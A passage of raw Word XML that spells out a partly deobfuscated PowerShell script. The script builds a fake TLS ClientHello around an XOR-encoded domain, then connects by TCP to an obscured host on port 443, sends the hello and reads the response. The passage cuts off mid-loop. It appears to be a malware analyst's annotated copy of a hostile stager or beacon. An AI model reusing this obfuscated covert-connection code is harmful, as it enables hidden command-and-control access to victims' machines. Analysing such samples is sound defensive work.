        <w:t>ASCII.GetBytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:r w:rsidR="005C3024">
        <w:t>XORED_222_STR</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ECC949" w14:textId="7223BBBC" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">            $</w:t>
      </w:r>
      <w:r w:rsidR="002F04B6">
        <w:t>DOMAIN_LEN _BE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[]] ([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BitConverter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>GetBytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>([UInt16]$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00595DE7">
        <w:t>DOMAIN</w:t>
      </w:r>
      <w:r>
        <w:t>.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF2BEF2" w14:textId="19359533" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                          [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:r w:rsidR="002F04B6">
        <w:t>DOMAIN_LEN _BE</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A944A6B" w14:textId="23BC915F" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                       $</w:t>
      </w:r>
      <w:r w:rsidR="00C90807">
        <w:t>00+DOMAIN+DOMAIN_LEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = @(0x00) + $</w:t>
      </w:r>
      <w:r w:rsidR="002F04B6">
        <w:t>DOMAIN_LEN _BE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + $</w:t>
      </w:r>
      <w:r w:rsidR="00595DE7">
        <w:t>DOMAIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F7B221" w14:textId="09A8A1D8" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                   $</w:t>
      </w:r>
      <w:r w:rsidR="002A18F3">
        <w:t>00+DOMAIN+DOMAIN+LEN_BE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[]] ([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BitConverter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>GetBytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>([UInt16]$</w:t>
      </w:r>
      <w:r w:rsidR="00C90807">
        <w:t>00+DOMAIN+DOMAIN_LEN</w:t>
      </w:r>
      <w:r>
        <w:t>.Length))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A796BDC" w14:textId="688B851F" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                       [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:r w:rsidR="002A18F3">
        <w:t>00+DOMAIN+DOMAIN+LEN_BE</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BC8E2" w14:textId="0819FAA3" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">         $</w:t>
      </w:r>
      <w:r w:rsidR="00AE0A90">
        <w:t>SUM_OF_DOMAIN+DOMAIN_LEN_BE_AND_DOMAIN+DOMAIN_LEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:r w:rsidR="002A18F3">
        <w:t>00+DOMAIN+DOMAIN+LEN_BE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + $</w:t>
      </w:r>
      <w:r w:rsidR="00C90807">
        <w:t>00+DOMAIN+DOMAIN_LEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC690DE" w14:textId="3531DD15" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">              $</w:t>
      </w:r>
      <w:r w:rsidR="00AE0A90">
        <w:t>THIS_ABOVE_BE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[]] ([BitConverter</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>GetBytes([UInt16]$</w:t>
      </w:r>
      <w:r w:rsidR="00AE0A90">
        <w:t>SUM_OF_DOMAIN+DOMAIN_LEN_BE_AND_DOMAIN+DOMAIN_LEN</w:t>
      </w:r>
      <w:r>
        <w:t>.Length))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B07DC6" w14:textId="43A29D19" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">        [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:r w:rsidR="00AE0A90">
        <w:t>THIS_ABOVE_BE</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED5E8B2" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                     $B8BB88BBBB8B88B8 = @(0x00,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4CF7B7" w14:textId="32CAE77E" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                0x00) + $</w:t>
      </w:r>
      <w:r w:rsidR="00AE0A90">
        <w:t>THIS_ABOVE_BE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + $</w:t>
      </w:r>
      <w:r w:rsidR="00AE0A90">
        <w:t>SUM_OF_DOMAIN+DOMAIN_LEN_BE_AND_DOMAIN+DOMAIN_LEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C7F57B" w14:textId="3442BC17" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                 $</w:t>
      </w:r>
      <w:r w:rsidR="00F635F4">
        <w:t>VAR2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = @(0x00, 0x0b,0x00,0x04,0x03,0x00,0x01,0x02,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20214CE6" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                                 0x00,0x0a,0x00,0x16,0x00,0x14,0x00,0x1d,0x00,0x17,0x00,0x1e,0x00,0x19,0x00,0x18,0x01,0x00,0x01,0x01,0x01,0x02,0x01,0x03,0x01,0x04,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388FC588" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                                            0x00,0x23,0x00,0x00,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99D229" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                              0x00,0x16,0x00,0x00,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E207457" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                                      0x00,0x17,0x00,0x00,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1C1AC6" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                                    0x00,0x0d,0x00,0x1e,0x00,0x1c,0x04,0x03,0x05,0x03,0x06,0x03,0x08,0x07,0x08,0x08,0x08,0x09,0x08,0x0a,0x08,0x0b,0x08,0x04,0x08,0x05,0x08,0x06,0x04,0x01,0x05,0x01,0x06,0x01,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473C10CB" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                                      0x00,0x2b,0x00,0x03,0x02,0x03,0x04,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D271E" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                             0x00,0x2d,0x00,0x02,0x01,0x01,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB28EE7" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                                   0x00,0x33,0x00,0x26,0x00,0x24,0x00,0x1d,0x00,0x20,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43210810" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                          0x35,0x80,0x72,0xd6,0x36,0x58,0x80,0xd1,0xae,0xea,0x32,0x9a,0xdf,0x91,0x21,0x38,0x38,0x51,0xed,0x21,0xa2,0x8e,0x3b,0x75,0xe9,0x65,0xd0,0xd2,0xcd,0x16,0x62,0x54)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653F26FA" w14:textId="6D739C95" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">           $BB88BB8BB88BB88B = $B8BB88BBBB8B88B8 + $</w:t>
      </w:r>
      <w:r w:rsidR="00F635F4">
        <w:t>VAR2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C72481" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">          $BBBB8B88888888B8 = [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[]] ([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BitConverter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>GetBytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>([UInt16]$BB88BB8BB88BB88B.Length))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD040FA" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">         [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($BBBB8B88888888B8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C59A80A" w14:textId="75F5EBB3" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">     $</w:t>
      </w:r>
      <w:r w:rsidR="00B33C1B">
        <w:t>ABOBA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = @(0x03,0x03,0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66904CCA" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                        0x0d,0x0e,0x0f,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DED453" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">               0x10,0x11,0x12,0x13,0x14,0x15,0x16,0x17,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2784400E" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                        0x18,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A3301" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">               0x19,0x1a,0x1b,0x1c,0x1d,0x1e,0x1f,0x20,0xe0,0xe1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A35FA5" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                   0xe2,0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,0xea,0xeb,0xec,0xed,0xee,0xef,0xf0,0xf1,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8,0xf9,0xfa,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4398EBD9" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                     0xfb,0xfc,0xfd,0xfe,0xff,0x00,0x08,0x13,0x02,0x13,0x03,0x13,0x01,0x00,0xff,0x01,0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9CB26E" w14:textId="5FC4FD99" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">          $BB8B8BBBB88B8B8B = $</w:t>
      </w:r>
      <w:r w:rsidR="00B33C1B">
        <w:t>ABOBA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + $BBBB8B88888888B8 + $BB88BB8BB88BB88B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0276148F" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">             $BB8BBB88B8B8B888 = [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[]] ([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BitConverter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>GetBytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($BB8B8BBBB88B8B8B.Length))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FF6953" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">        [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($BB8BBB88B8B8B888)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F78518D" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">     $BBB88BBB888B8B8B = @(0x01) + $BB8BBB88B8B8B888[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3] + $BB8B8BBBB88B8B8B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD41C4" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $B88B888B8BB8BBBB = [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[]] ([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BitConverter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>GetBytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>([UInt16]$BBB88BBB888B8B8B.Length))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6430C598" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">         [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($B88B888B8BB8BBBB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E19420E" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                      $BBB888888BB88B88 = @(0x16,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A07EF8C" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                   0x03, 0x01) + $B88B888B8BB8BBBB + $BBB88BBB888B8B8B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7DAD3E" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">       return ,$BBB888888BB88B88</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696C0620" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7033FB53" w14:textId="776E604B" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:r w:rsidR="000F7196">
        <w:t>CLIENT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.Net.Sockets.TcpClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="153D891B" w14:textId="613CACAE" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                    $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F7196">
        <w:t>CLIENT</w:t>
      </w:r>
      <w:r>
        <w:t>.Connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>((</w:t>
      </w:r>
      <w:r>
        <w:t>Func1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00553834">
        <w:t>ARRAY_TO_FUNC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> @(5,7,25,2,25,3,15,25,5,7,7) -</w:t>
      </w:r>
      <w:r>
        <w:t>KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 55), ((50 * 9) - (11 * 2)) + [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>math</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Pow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2, 3) + [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>math</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Sqrt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(49))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C17E4A" w14:textId="7F12BED9" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">      $</w:t>
      </w:r>
      <w:r w:rsidR="000F7196">
        <w:t>TCP_STREAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F7196">
        <w:t>CLIENT</w:t>
      </w:r>
      <w:r>
        <w:t>.GetStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E16C08A" w14:textId="27E5071B" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:r w:rsidR="00CE001B">
        <w:t>FUNC4_RET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="008D77B5">
        <w:t>Func4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E53817" w14:textId="0BC8647C" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">        $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F7196">
        <w:t>TCP_STREAM</w:t>
      </w:r>
      <w:r>
        <w:t>.Write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:r w:rsidR="00CE001B">
        <w:t>FUNC4_RET</w:t>
      </w:r>
      <w:r>
        <w:t>, 0, $</w:t>
      </w:r>
      <w:r w:rsidR="00CE001B">
        <w:t>FUNC4_RET</w:t>
      </w:r>
      <w:r>
        <w:t>.Length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A5888C" w14:textId="2FEA2DBE" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">        $</w:t>
      </w:r>
      <w:r w:rsidR="00826F33">
        <w:t>OBJECT_READ_TO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[] 16384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E74338F" w14:textId="03896C31" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">          $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F7196">
        <w:t>TCP_STREAM</w:t>
      </w:r>
      <w:r>
        <w:t>.Read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:r w:rsidR="00826F33">
        <w:t>OBJECT_READ_TO</w:t>
      </w:r>
      <w:r>
        <w:t>, 0, $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00826F33">
        <w:t>OBJECT_READ_TO</w:t>
      </w:r>
      <w:r>
        <w:t>.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) | Out-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AEAC07A" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ($</w:t>
